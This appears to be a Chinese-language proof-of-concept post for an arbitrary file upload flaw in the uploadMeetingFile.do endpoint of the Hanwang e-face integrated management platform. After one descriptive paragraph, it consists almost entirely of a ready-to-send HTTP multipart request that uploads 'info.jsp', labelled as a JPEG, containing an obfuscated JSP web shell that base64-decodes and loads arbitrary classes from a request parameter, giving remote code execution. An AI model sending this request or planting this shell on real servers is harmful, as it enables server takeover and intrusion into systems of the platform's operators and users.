漏洞描述
文件上传漏洞发生在应用程序允许用户上传文件的功能中,如果上传功能未能正确地验证和限制上传文件的类型和内容,攻击者可能利用此漏洞上传恶意文件,如包含可执行代码的脚本文件,从而在服务器上执行任意命令,控制或破坏系统。
汉王e脸通综合管理平台 uploadMeetingFile.do 任意文件上传漏洞
PoC代码
POST /manage/mobiMeetingApp/uploadMeetingFile.do HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 1597
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Token: xxxxxxxxxxxxxxxxx
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="info.jsp"
Content-Type: image/jpeg
<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:declaration>
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class GnDlLQpR(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] KWPXeYqY(String str) throws Exception {
try {
Class HnktBjpK = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) HnktBjpK.getMethod("decodeBuffer", String.class).invoke(HnktBjpK.newInstance(), str);
} catch (Exception e) {
Class HnktBjpK = Class.forName("java.util.Base64");
Object cUASwQYK = HnktBjpK.getMethod("getDecoder").invoke(null);
return (byte[]) cUASwQYK.getClass().getMethod("decode", String.class).invoke(cUASwQYK, str);
}
}
Thread cT = Thread.currentThread();
ClassLoader BfDrVfLM = cT.getContextClassLoader();
</jsp:declaration>
<jsp:scriptlet>
String boWqnWUy = requ<![CDATA[est]]>.getParameter("asdowi243");
if (boWqnWUy != null) {
Class IFwYZevI = new U(BfDrVfLM).GnDlLQpR(KWPXeYqY(boWqnWUy));
IFwYZevI.newInstance().equals(pageContext);
}
</jsp:scriptlet>
</jsp:root>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--